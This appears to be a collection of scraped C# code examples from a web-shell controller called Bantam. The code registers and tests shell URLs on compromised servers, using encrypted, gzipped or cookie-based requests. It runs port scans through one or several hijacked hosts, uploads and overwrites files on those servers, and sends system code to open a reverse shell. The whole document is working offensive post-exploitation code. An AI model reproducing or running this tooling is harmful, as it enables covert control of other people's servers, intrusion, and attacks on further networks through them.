Exemplo n.º 1
0
        /// <summary>
        /// Main port scan routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnScan_Click(object sender, EventArgs e)
        {
            if (btnScan.Enabled == false)
            {
                return;
            }

            string target = textBoxHost.Text;

            if (string.IsNullOrEmpty(target) &&
                !Helper.IsValidIPv4(target) &&
                !Helper.IsValidUri(target))
            {
                labelDynStatus.Text = "Invalid IP/Url.";
                return;
            }

            btnScan.Enabled = false;

            if (BantamMain.Shells.ContainsKey(ShellUrl))
            {
                string portsCode = string.Empty;

                bool encryptResponse        = BantamMain.Shells[ShellUrl].ResponseEncryption;
                int  ResponseEncryptionMode = BantamMain.Shells[ShellUrl].ResponseEncryptionMode;

                if (int.TryParse(textBoxPorts.Text, out int outVal))
                {
                    if (!string.IsNullOrEmpty(textBoxPorts.Text))
                    {
                        portsCode           = "$ports = array('" + textBoxPorts.Text + "');";
                        labelDynStatus.Text = "";
                    }
                    else
                    {
                        if (comboBoxCommonPorts.SelectedIndex != 0)
                        {
                            if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ONE_TO_1024)
                            {
                                portsCode           = PhpBuilder.PortsScannerPorts1To1024();
                                labelDynStatus.Text = "** May fail unless on local IP";
                            }
                            else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.COMMON_PORTS)
                            {
                                labelDynStatus.Text = "** May fail unless on local IP";
                                portsCode           = PhpBuilder.PortScannerPortsCommon();
                            }
                            else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ALL_PORTS)
                            {
                                portsCode           = PhpBuilder.PortScannerPortsAll();
                                labelDynStatus.Text = "** May fail unless on local IP";
                            }
                        }
                    }
                    string phpCode = PhpBuilder.PortScanner(textBoxHost.Text, portsCode, encryptResponse);
                    BantamMain.ExecutePHPCodeDisplayInRichTextBox(ShellUrl, phpCode, "Opened Ports - " + textBoxHost.Text, encryptResponse, ResponseEncryptionMode);
                }
            }
            btnScan.Enabled = true;
        }
Exemplo n.º 2
0
        /// <summary>
        /// Task wrapper for popping reverse shell without chankro
        /// </summary>
        /// <param name="shellCode"></param>
        private async Task PopReverseShell(string shellCode)
        {
            string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false);
            await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));

            if (checkBoxLogShellCode.Checked)
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED);
            }
        }
Exemplo n.º 3
0
        /// <summary>
        /// Main upload routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnUpload_Click(object sender, EventArgs e)
        {
            string phpCode = string.Empty;

            btnBrowse.Enabled    = false;
            btnUpload.Enabled    = false;
            richTextBox1.Enabled = false;

            if (EditingSelf)
            {
                if (!string.IsNullOrEmpty(richTextBox1.Text))
                {
                    phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
                }
                else
                {
                    LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
                    btnUpload.Enabled = true;
                    return;
                }

                phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, phpCode);
            }
            else
            {
                if (!string.IsNullOrEmpty(LocalFileLocation))
                {
                    phpCode = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
                }
                else if (!string.IsNullOrEmpty(richTextBox1.Text))
                {
                    phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
                }
                else
                {
                    LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
                    btnUpload.Enabled = true;
                    return;
                }

                string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
                phpCode = PhpBuilder.WriteFile(remoteFileLocation, phpCode);
            }

            await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);

            btnUpload.Enabled    = true;
            btnBrowse.Enabled    = true;
            richTextBox1.Enabled = true;

            this.Close();
        }
        /// <summary>
        /// Main Distributed scanning routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnScan_Click(object sender, EventArgs e)
        {
            if (string.IsNullOrEmpty(textBoxTarget.Text))
            {
                lblStatus.Text = "Invalid IP/Url.";
                return;
            }

            string target = textBoxTarget.Text;

            if (!Helper.IsValidIPv4(target) &&
                !Helper.IsValidUri(target))
            {
                lblStatus.Text = "Invalid IP/Url.";
                return;
            }

            if (string.IsNullOrEmpty(textBoxStartPort.Text) ||
                string.IsNullOrEmpty(textBoxEndPort.Text))
            {
                lblStatus.Text = "Invalid port.";
                return;
            }

            int startPort = Convert.ToInt32(textBoxStartPort.Text);
            int endPort   = Convert.ToInt32(textBoxEndPort.Text);

            if (startPort > endPort ||
                endPort <= 0 || startPort <= 0 ||
                startPort > PORT_MAX || endPort > PORT_MAX)
            {
                lblStatus.Text = "Invalid port.";
                return;
            }

            btnScan.Enabled = false;

            string      windowTitle = "Open Ports ( " + target + " )";
            RichTextBox rtb         = GuiHelper.RichTextBoxDialog(windowTitle, string.Empty);

            int shellsCount   = checkedListBoxShells.CheckedItems.Count;
            int portsPerShell = ((endPort - startPort) / shellsCount);

            int iter = 1;

            foreach (var checkedItem in checkedListBoxShells.CheckedItems)
            {
                string portsCode    = string.Empty;
                string scannedRange = string.Empty;
                if (iter == shellsCount)
                {
                    if (iter == 1)
                    {
                        scannedRange = startPort.ToString() + ", " + (endPort).ToString();
                        portsCode    = "$ports = range(" + scannedRange + ");";
                    }
                    else
                    {
                        scannedRange = (((iter - 1) * portsPerShell) + 1).ToString() + ", " + (endPort).ToString();
                        portsCode    = "$ports = range(" + scannedRange + ");";
                    }
                }
                else
                {
                    if (iter == 1)
                    {
                        scannedRange = startPort.ToString() + ", " + (iter * portsPerShell).ToString();
                        portsCode    = "$ports = range(" + scannedRange + ");";
                    }
                    else
                    {
                        scannedRange = (((iter - 1) * portsPerShell) + 1).ToString() + ", " + (iter * portsPerShell).ToString();
                        portsCode    = "$ports = range(" + scannedRange + ");";
                    }
                    iter++;
                }

                bool   encryptResponse = true;
                string shellUrl        = checkedListBoxShells.GetItemText(checkedItem);

                string responseText = "[" + shellUrl + "] - returned ports (" + scannedRange + ") - \r\n";
                string phpCode      = PhpBuilder.PortScanner(target, portsCode, encryptResponse);

                lblStatus.Text = "Scanning.";

                BantamMain.ExecutePHPCodeDisplayInRichTextBox(shellUrl, phpCode, windowTitle, encryptResponse, (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL, false, rtb, responseText);

                btnScan.Enabled = true;
            }
        }
Exemplo n.º 5
0
        /// <summary>
        /// Main add shell/host To GUI routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnAddShell_Click(object sender, EventArgs e)
        {
            string shellURL = txtBoxShellUrl.Text;

            if (string.IsNullOrEmpty(shellURL))
            {
                return;
            }

            if (checkBoxEncryptRequest.Checked)
            {
                string encryptionKey = textBoxEncrpytionKey.Text;

                if (encryptionKey.Length != 32)
                {
                    labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
                    return;
                }

                if (!checkBoxSendIVInRequest.Checked)
                {
                    string encryptionIV = textBoxEncrpytionIV.Text;

                    if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
                    {
                        labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                        return;
                    }
                }
            }

            //Remove Shell
            if (BantamMain.Shells.ContainsKey(shellURL))
            {
                BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

                if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
                {
                    LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                    return;
                }
            }

            //Add Shell
            if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
            {
                LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                return;
            }

            BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;

            if (comboBoxVarType.Text == "cookie")
            {
                BantamMain.Shells[shellURL].SendDataViaCookie = true;
            }

            if (checkBoxResponseEncryption.Checked == false)
            {
                BantamMain.Shells[shellURL].ResponseEncryption = false;
            }
            else
            {
                BantamMain.Shells[shellURL].ResponseEncryption     = true;
                BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
            }

            if (checkBoxGZipRequest.Checked)
            {
                BantamMain.Shells[shellURL].GzipRequestData = true;
            }
            else
            {
                BantamMain.Shells[shellURL].GzipRequestData = false;
            }

            bool encryptResponse        = BantamMain.Shells[shellURL].ResponseEncryption;
            int  ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;

            if (checkBoxEncryptRequest.Checked)
            {
                BantamMain.Shells[shellURL].RequestEncryption    = true;
                BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;

                if (checkBoxSendIVInRequest.Checked)
                {
                    BantamMain.Shells[shellURL].SendRequestEncryptionIV           = true;
                    BantamMain.Shells[shellURL].RequestEncryptionIV               = string.Empty;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
                }
                else
                {
                    BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                }
            }
            else
            {
                BantamMain.Shells[shellURL].RequestEncryption = false;
                BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionIV  = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
            }

            string         phpCode  = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
            ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

            if (string.IsNullOrEmpty(response.Result))
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            string result = response.Result;

            if (encryptResponse)
            {
                result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
            }

            if (string.IsNullOrEmpty(result) || result != "1")
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            BantamMain.Instance.InitializeShellData(shellURL);

            this.Close();
        }